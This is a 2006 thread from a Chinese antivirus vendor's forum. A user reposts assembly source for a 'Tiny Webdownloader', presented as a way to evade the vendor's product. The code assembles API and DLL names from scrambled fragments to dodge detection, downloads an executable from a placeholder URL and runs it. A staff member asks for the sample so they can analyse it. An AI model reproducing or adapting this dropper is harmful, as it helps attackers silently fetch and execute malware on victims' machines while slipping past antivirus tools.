微点交流论坛

标题: 我从别的看到的一种病毒通过微点的思路 [打印本页]

作者: xiahanxing 时间: 2006-9-6 16:53 标题: 我从别的看到的一种病毒通过微点的思路

我从别的看到的一种病毒通过微点的思路
转载过来微点研发人员看看 hoho

过微点的方法（源码）
不被微点报的前提是不访问网络，不生孩子

;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;unremote@knology.net

.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0

.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?

.code
_main:
;unscrambles urlmon.dll
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1

;unscrambles URLDownloadToFileA
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5

;loads urlmon.dll
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax

;links URLDownloadToFileA dynamically
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax

;delete previous version
invoke DeleteFile, addr Exe

;downloads the exe
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile

;runs the exe
invoke WinExec, addr Exe, 0

;exits
invoke ExitProcess, 0

end _main

作者: 微点专家 时间: 2006-9-6 18:02
请把您的这个程序发到virus@micropoint.com.cn让微点具体分析下！！！

[ Last edited by 微点专家 on 2006-9-6 at 18:05 ]

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn